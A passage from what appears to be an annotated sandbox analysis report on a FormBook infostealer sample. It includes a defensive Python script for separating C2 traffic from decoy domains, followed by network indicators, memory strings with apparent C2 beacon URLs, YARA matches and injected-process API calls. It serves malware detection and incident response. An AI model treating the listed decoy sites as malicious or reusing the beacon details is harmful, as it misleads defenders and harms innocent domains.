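        "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com",
        "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com",
        "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com",
    ],
}


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers (lower-cased
    names), raw query parameters (no percent/plus decoding, so base64-like
    values keep their '+' and '/'), and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "params": params,
            "host": headers.get("host", ""), "headers": headers, "body": body}


def formbook_fanout(requests, min_hosts=3):
    """Group requests by URI path and flag paths seen on >= min_hosts distinct
    hosts. For each flagged path report which query parameters are identical
    across every host, and how many requests lack a User-Agent or send
    Connection: close (the traits the report calls out)."""
    by_path = defaultdict(list)
    for r in requests:
        by_path[r["path"]].append(r)
    flagged = {}
    for path, group in by_path.items():
        hosts = {r["host"].lower() for r in group}
        if len(hosts) < min_hosts:
            continue
        constant = dict(group[0]["params"])
        for r in group[1:]:
            constant = {k: v for k, v in constant.items() if r["params"].get(k) == v}
        flagged[path] = {
            "hosts": len(hosts),
            "constant_params": constant,
            "no_user_agent": sum("user-agent" not in r["headers"] for r in group),
            "connection_close": sum(r["headers"].get("connection", "").lower() == "close" for r in group),
        }
    return flagged


def _bare(host):
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def classify_hosts(requests, config):
    """Bucket observed Host values as the configured C2, a configured decoy,
    or unknown. Only the C2 bucket is worth a block or a takedown request."""
    c2_hosts = {_bare(url.split("/", 1)[0]) for url in config["C2 list"]}
    decoys = {d.lower() for d in config["decoy"]}
    result = {"c2": [], "decoy": [], "unknown": []}
    for host in sorted({r["host"] for r in requests}):
        bare = _bare(host)
        bucket = "c2" if bare in c2_hosts else "decoy" if bare in decoys else "unknown"
        result[bucket].append(host)
    return result


if __name__ == "__main__":
    reqs = [parse_request(r) for r in RAW_REQUESTS]
    for path, info in formbook_fanout(reqs).items():
        print(path, info)
    print(classify_hosts(reqs, CONFIG))
```

Two consequences for a responder follow from the output. First, the decoy hosts are legitimate third-party sites (the 404 from a WordPress install further down is one of them answering), so blocking every destination the sample talked to would mostly block innocent domains; the configuration, not the traffic, tells you which one host matters. Second, the path plus the constant parameter survive across the decoy rotation, which is why the Emerging Threats rules above fire on GET requests to four different IPs.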
IP address seen in connection with other malware
Source: Joe Sandbox View; IP Address: 95.215.210.10
Source: Joe Sandbox View; IP Address: 209.99.40.222
Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: NEWIT-ASRU
Source: Joe Sandbox View; ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View; ASN Name: WEEBLYUS
Source: unknown; TCP traffic detected without corresponding DNS query: 23.211.6.115 (reported 50 times)
Source: unknown; DNS traffic detected: queries for: www.narrowpathwc.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Date: Tue, 03 Aug 2021 20:58:18 GMT | Server: Apache | X-Powered-By: PHP/7.4.21 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/" | Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a | Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://domain.idwebhosting.net/linkhandler/servlet/RenewDomainServlet?validatenow=false&orderid=
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmp; String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.666382323.0000000002B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: Purchase contract #9009.exe, 00000001.00000003.641742892.00000000054C7000.00000004.00000001.sdmp, Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Purchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmp; String found in binary or memory: http://www.carterandcone.com
Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: Purchase contract #9009.exe, 00000001.00000003.641859108.00000000054C6000.00000004.00000001.sdmp; String found in binary or memory: http://www.carterandcone.como.
          Source: Purchase contract #9009.exe, 00000001.00000003.642994387.00000000054C7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comva
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Purchase contract #9009.exe, 00000001.00000003.644334757.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Purchase contract #9009.exe, 00000001.00000003.645950157.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Purchase contract #9009.exe, 00000001.00000003.645781018.00000000054FD000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlv
          Source: Purchase contract #9009.exe, 00000001.00000003.645715148.00000000054CB000.00000004.00000001.sdmp, Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Purchase contract #9009.exe, 00000001.00000002.666374405.0000000000BE7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comcea
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Purchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Purchase contract #9009.exe, 00000001.00000003.641605989.00000000054C4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnL
          Source: Purchase contract #9009.exe, 00000001.00000003.648690279.00000000054F7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Purchase contract #9009.exe, 00000001.00000003.648690279.00000000054F7000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/~;
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/10_Best_Mutual_Funds.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Best_Penny_Stocks.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN1
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Credit_Card_Application.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6R
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/High_Speed_Internet.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgie
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Migraine_Pain_Relief.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6Rbgi
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/Work_from_Home.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/display.cfm
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/fashion_trends.cfm?fp=nC8Pk0gfsEigB97umX6ZboCBtPUHMYhCzaY6RbgieN12hb
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/px.js?ch=1
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/px.js?ch=2
          Source: explorer.exe, 00000009.00000002.905600116.0000000005182000.00000004.00000001.sdmpString found in binary or memory: http://www.mtsnurulislamsby.com/sk-logabpstatus.php?a=eFZNZlhSdFVpS3duNGs2T2hoQ25jOWtLbFlraHVGVkFYVy
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Purchase contract #9009.exe, 00000001.00000002.675367239.0000000006742000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Purchase contract #9009.exe, 00000001.00000003.641815533.00000000054C6000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49681
          Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknown | Network traffic detected: HTTP traffic on port 49681 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: Purchase contract #9009.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_004181C0 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_00418270 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_004182F0 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_004183A0 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_0041826C NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_00418215 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_004182EA NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9950 NtQueueApcThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E99D0 NtCreateProcessEx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015EB040 NtSuspendThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9820 NtEnumerateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E98A0 NtWriteVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9B00 NtSetValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015EA3B0 NtGetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9A10 NtQuerySection
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9A80 NtOpenDirectoryObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9560 NtWriteFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015EAD30 NtSetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E9520 NtWaitForSingleObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4_2_015E95F0 NtQueryInformationFile
